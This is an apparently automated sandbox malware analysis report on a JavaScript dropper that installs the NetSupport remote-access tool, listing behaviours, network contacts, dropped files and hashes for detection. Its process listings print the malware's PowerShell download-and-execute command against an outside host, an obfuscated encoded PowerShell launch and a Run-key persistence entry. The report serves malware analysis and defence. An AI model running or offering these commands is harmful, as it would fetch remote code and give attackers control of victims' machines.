Malware Analysis Report

2024-10-19 01:40

Sample ID 240207-lh7rasgecr
Target ARS17291729317291729.js
SHA256 2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b
Tags netsupport, persistence, rat
Score 10/10

Analysis Overview

score
10/10

SHA256

2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b

Threat Level: Known bad

The file ARS17291729317291729.js was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-07 09:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-07 09:33

Reported

2024-02-07 09:36

Platform

win7-20231215-en

Max time kernel

119s

Max time network

123s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
CA 67.43.225.106:443 assime.ca tcp

Files

memory/2804-4-0x000000001B410000-0x000000001B6F2000-memory.dmp

memory/2804-5-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

memory/2804-6-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2804-8-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-7-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-9-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-10-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2804-11-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-12-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-13-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-14-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-07 09:33

Reported

2024-02-07 09:36

Platform

win10v2004-20231215-en

Max time kernel

142s

Max time network

152s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe | N/A

Adds Run key to start application

Tags persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco [encoded command argument not present in the report]

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 182.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 18.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
US 8.8.8.8:53 sakaleralo.com udp
DE 192.121.22.184:80 sakaleralo.com tcp
US 8.8.8.8:53 106.225.43.67.in-addr.arpa udp
US 8.8.8.8:53 184.22.121.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 createcgroup.com udp
GB 5.61.62.93:443 createcgroup.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 172.67.68.212:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 93.62.61.5.in-addr.arpa udp
US 8.8.8.8:53 212.68.67.172.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/2124-0-0x000001C9A80B0000-0x000001C9A80D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0sixysy.4ht.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2124-10-0x00007FFBAB2D0000-0x00007FFBABD91000-memory.dmp

memory/2124-12-0x000001C9A5F30000-0x000001C9A5F40000-memory.dmp

memory/2124-13-0x000001C9A5F30000-0x000001C9A5F40000-memory.dmp

memory/2124-11-0x000001C9A5F30000-0x000001C9A5F40000-memory.dmp

memory/2892-23-0x00007FFBAB2D0000-0x00007FFBABD91000-memory.dmp

memory/2892-24-0x00000298F5890000-0x00000298F58A0000-memory.dmp

memory/2892-26-0x00000298F7A10000-0x00000298F7A22000-memory.dmp

memory/2892-27-0x00000298F5880000-0x00000298F588A000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

MD5 a2b46c59f6e7e395d479b09464ecdba0
SHA1 92c132307dd21189b6d7912ddd934b50e50d1ec1
SHA256 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
SHA512 4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll

MD5 5820a7b3f84d1465266b80882af2f16d
SHA1 20a826086b6554050e78e32ddb98de5c40fb8ad4
SHA256 a90112014cbf9903059a6f2bfc4aaac34cbc5516ae6d006dfa09275360f90bc6
SHA512 beea5508f8a32aa553ff2cb2ec57bef44ebad1846f743fec1169febdd7eb5badcf68afb91dc57899b84aad4d1faf28b32328304bd1583c0e47989dee9cf87fdd

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.DLL

MD5 d8c80f23784bb87f4f191ef51c5644c2
SHA1 f4dbf9b1b7d25af2f77554701b2b2d87cf0c5714
SHA256 ad92fbd28017da5cfe5f441abc16ca72d0ee50680b11396c791c6912ec691bf5
SHA512 10b0eb674b39af3d0a795ca83d06465d962a31e17e4ddf4cdda52e3eb3c2065b9c8f91ff4efc1b604857ee935cb89a2124414b092744b3ad202f64fed6071ba8

C:\Users\Admin\AppData\Local\modem_gprs_modules\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

memory/2892-71-0x00007FFBAB2D0000-0x00007FFBABD91000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICAPI.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Local\modem_gprs_modules\MSVCR100.dll

MD5 96376583083f19b05b3ea026d643a759
SHA1 5855e953a8f277f751a2f0e660e3d63b067efb2e
SHA256 dd9a42bf02a97990ced074a78c91709e5111c89e80a92b86aa00207f3adf1ba2
SHA512 318956260805761e99dfad127c76fd97d920b77f5df055936d546465ba845b5f72525e3a9bd1c2f3afe59d91ae64bb7a0b1a9399a4319589520336e379954548

C:\Users\Admin\AppData\Local\modem_gprs_modules\msvcr100.dll

MD5 b81466c844868a5cc3f51441dba0749c
SHA1 7838d8271450e95b5fa10a9f50039f1f7dc37931
SHA256 6549f8fb70689f44b11340dc7055f0c71f8009589f6d53e77e51f678a104e2de
SHA512 c89c72db647886a7d0f32a7eed62a01f9babe78c7902cb16f241898fb83637ac51016d654eb5b3983bdbe6848c9721972ae27ce994b3dc5866f87c17eb4e24b1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 512c6cab650bfda6ef2995f6b515ed6f
SHA1 fec40abf4f5d74ea7f8828cee83770e423203083
SHA256 84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262
SHA512 638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2b24af1492f112d2e53cb7415fda39f
SHA1 dbfcee57242a14b60997bd03379cc60198976d85
SHA256 fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

memory/2124-80-0x00007FFBAB2D0000-0x00007FFBABD91000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini

MD5 2cd1a8115b7328756129052384e2eed6
SHA1 9458e9553d3d1f075ed09a06fda3f36136781704
SHA256 02ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2
SHA512 df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455

C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC

MD5 866c96ba2823ac5fe70130dfaaa08531
SHA1 892a656da1ea264c73082da8c6e5f5728abcb861
SHA256 6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921
SHA512 0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 788c5e3bc18602ba15ad93d6c03a7207
SHA1 af86597423f64e6a6dc82ae76207beda512f410c
SHA256 61ecfbcc8d66f4b7d876b0193b895d3066487333bac985f90da661432ea12f7b
SHA512 0190c33420ed9557e0635db349ba4d04a0fcbcd9f57d09687fe51a7f68a14520bb2fd73ba9fe95da9556efab2d9578dd5da046d7313ed22872a1996f8a2e9455

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 93f0e1f715d2494b261c256f3e9bd431
SHA1 1466546b8167f355f561a636eacf8d70f236ccd7
SHA256 c63f9343eaaf29c48e2d5fe00ac0149218d0bf80f55e151e4a07c9e385221622
SHA512 ffa75c323432a640790cbca82003ef4cdc36d3785f0e54fe2bf84b8fc1141e462db1082f3ae46ff6d01eef95959a6e1a606b6d9e2f6d1efd37393b8300980b28